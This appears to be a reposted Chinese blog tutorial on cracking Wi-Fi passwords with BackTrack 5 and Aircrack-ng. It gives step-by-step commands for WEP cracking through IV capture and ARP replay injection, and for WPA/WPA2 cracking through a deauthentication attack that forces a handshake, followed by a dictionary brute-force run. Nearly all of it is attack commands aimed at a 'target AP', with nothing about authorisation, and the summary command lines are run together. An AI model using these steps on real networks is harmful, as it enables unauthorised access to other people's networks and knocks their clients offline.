无线网络破解(BT5、Aircrack)

来源:互联网 发布:思民软件 编辑:程序博客网 时间:2024/04/30 08:19

 

软件环境 BT5 、Aircrack-ng 1.1

通用初始化命令:

ifconfig -aifconfig wlan0 upairmon-ng start wlan0


WEP破解:

airodump-ng -t wep mon0airodump-ng -d *** -c * -i -w *** mon0aireplay-ng -3 -d *** -h *** mon0aircrack-ng *.ivs


WPA破解:

airodump-ng -t wpa mon0airodump-ng -d *** -c * -w *** mon0aireplay-ng -0 1 -a *** -c *** mon0aircrack-ng -w *** *.cap 

 

一、WEP
WEP破解起来比较简单
1、打开一个SHELL,用ifconfig -a查看无线网卡是否识别(同时查看是否UP,这个在BT5中似乎默认就是UP了的,至少在我的电脑上是)
2、如果没有UP,输入ifconfig wlan0 up
3、接下来将网卡至于MON模式,airmon-ng start wlan0
4、开始扫描所有WEP模式加密的AP,airodump-ng -t wep mon0
5、选定要攻击的AP后开始抓包,airodump-ng -d 00ff****** -c 13 -i -w MyAp mon0
   -d 参数后面跟目标AP的MAC
      -c 参数后面跟目标AP所在的CH
      -i  参数表示抓IVS
      -w 参数后跟所要保存IVS的文件名
6、再开一个SHELL,用aireplay-ng进行攻击,加快抓包速度
    aireplay-ng -3 -d 00ff***** -h 442a***** mon0
      -3 表示攻击模式,常用就这个就行
      -d 参数后跟目标AP的MAC,这个命令也可以用-e 后面跟AP的名字取代
      -h 你在airodump-ng抓包窗口中看到的连接到AP上的客户端的MAC
7、在抓包的同时你可以随时进行破解,在你运行airodump-ng时的目录下面可以看到你抓到的ivs文件,按照上面命令你会看到的是MyAp-01.ivs,切换到你运行airodump-ng时的目录,然后执行
    aircrack-ng MyAp-01.ivs
    基本上ivs在15000以上就能PJ了,运气好10000左右也可以
8、最后用命令行方式有一个好处就是抓包可以多次,分别抓包后形成的ivs大致像MyAp-01.ivs MyAp-02.ivs这样顺序排下去的,在破解的时候,可以用aircrack-ng MyAp*.ivs就可以一次读入多个文件统一进行破解。

 

二、WPA WPA2

 1、打开一个SHELL,用ifconfig -a查看无线网卡是否识别(同时查看是否UP,这个在BT5中似乎默认就是UP了的,至少在我的电脑上是)
2、如果没有UP,输入ifconfig wlan0 up
3、接下来将网卡至于MON模式,airmon-ng start wlan0
4、开始扫描所有WPA模式加密的AP,airodump-ng -t wpa mon0

5、选定要攻击的AP后开始抓包,airodump-ng -d 00ff****** -c 13 -w MyAp mon0
   -d 参数后面跟目标AP的MAC
      -c 参数后面跟目标AP所在的CH
      -w 参数后跟所要保存IVS的文件名

   注:这里不使用-i参数

6、对目标AP进行Deauth攻击,aireplay-ng -0 1 -a 00ff**** -c 002a**** mon0

   -0 参数表示进行Deauth攻击,后面数字是攻击次数

   -a 参数后面跟目标AP的MAC

   -c 参数后面跟目标AP上可用客户端的MAC

   注:要想抓到握手包必须有可用客户端,针对多个可用客户端可以同时攻击,可用客户端信号好的情况下成功率很高。

7、当抓包界面左上角出现类似 WPA handshake:00:17:*****字样的时候说明抓包结束,可以关掉airodump-ng进程,在执行airodump-ng命令的目录下找到cap文件。

8、用aircrack-ng挂字典进行暴力破解,aircrack-ng -w ***.txt ***.cap

   -w 参数后面跟字典档

   *.cap是抓到的握手包文件

 

三、airodump-ng界面操作

1、TAB键后可用上下键操作,按M键标记

2、S键可以改变排序字段

3、A键选择显示模式

4、SPACE键可以暂停

5、--berlin <secs> 参数可以控制多少秒内没有获得新包删除AP

 

四、aireplay-ng

1、可以使用-e <essid>参数

 

五、aircarck-ng

1、如果EWSA不认aircrack抓的握手包可以用 aircrack-ng test.cap -E test.mkp直接生产EWSA所要的工程文件

 

 

原创粉丝点击